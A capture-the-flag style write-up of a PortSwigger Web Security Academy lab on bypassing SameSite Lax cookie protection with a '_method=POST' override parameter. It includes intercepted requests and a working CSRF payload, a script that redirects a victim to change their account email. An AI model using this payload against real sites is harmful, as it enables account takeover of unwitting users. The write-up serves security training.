| Field | Value |
|---|---|
| Platform | PortSwigger Web Security Academy |
| Type | CSRF — SameSite Lax Bypass |
| Difficulty | Practitioner |
| Target | 0a900022045dd35b8033123200a40023.web-security-academy.net |
| Objective | Bypass SameSite Lax cookie restrictions and change the victim's email address |
| Note | Victim uses Chrome — test with Chrome or Burp's built-in Chromium browser |
SameSite Lax Bypass via Method Override — Writeup¶
Reconnaissance¶
Initial Observation¶
Logged in as wiener:peter. Intercepting the email change request:
POST /my-account/change-email HTTP/1.1
Host: 0a900022045dd35b8033123200a40023.web-security-academy.net
Cookie: session=KEf36WdqVlvrMrTEFs79WepktfbRUN6V
[email protected]
No CSRF token in the request, and none in the form source either:
<form class="login-form" name="change-email-form" action="/my-account/change-email" method="POST">
<label>Email</label>
<input required="" type="email" name="email" value="">
<button class="button" type="submit"> Update email </button>
</form>
No token to bypass. The only protection here is the session cookie's SameSite policy. Chrome enforces Lax by default, which means cross-site POST requests won't include the cookie — a standard CSRF PoC with a hidden form won't work. But Lax does allow cookies on top-level GET navigations, so a GET to the endpoint would carry the session cookie across sites.
Web — Method Override Discovery¶
Switching the POST to a plain GET:
GET /my-account/[email protected] HTTP/1.1
405 Method Not Allowed — the endpoint explicitly rejects GET.
Adding _method=POST as a query parameter:
GET /my-account/[email protected]&_method=POST HTTP/1.1
Host: 0a900022045dd35b8033123200a40023.web-security-academy.net
Cookie: session=KEf36WdqVlvrMrTEFs79WepktfbRUN6V
302 Found — email changed.
The backend framework honors _method as a way to override the HTTP verb. The request travels as GET (so SameSite Lax lets the cookie through on a top-level navigation) but the server processes it as POST. That's the bypass.
Attack Path¶
Exploit — GET Navigation with Method Override¶
Since the attack needs to be a top-level navigation for SameSite Lax to include the cookie, a location redirect from the exploit server is the right delivery:
<script>
location="https://0a900022045dd35b8033123200a40023.web-security-academy.net/my-account/[email protected]&_method=POST"
</script>
Victim visits the exploit server → location redirects their browser to the crafted URL → browser sends a top-level GET navigation → SameSite Lax includes the session cookie → server treats _method=POST as a POST → email changes.
Storing the exploit and delivering to the victim solves the lab :P
Resources¶
- PortSwigger — Bypassing SameSite cookie restrictions
- PortSwigger — CSRF
- MDN — SameSite cookies
- Burp Suite Professional — request method switching, Repeater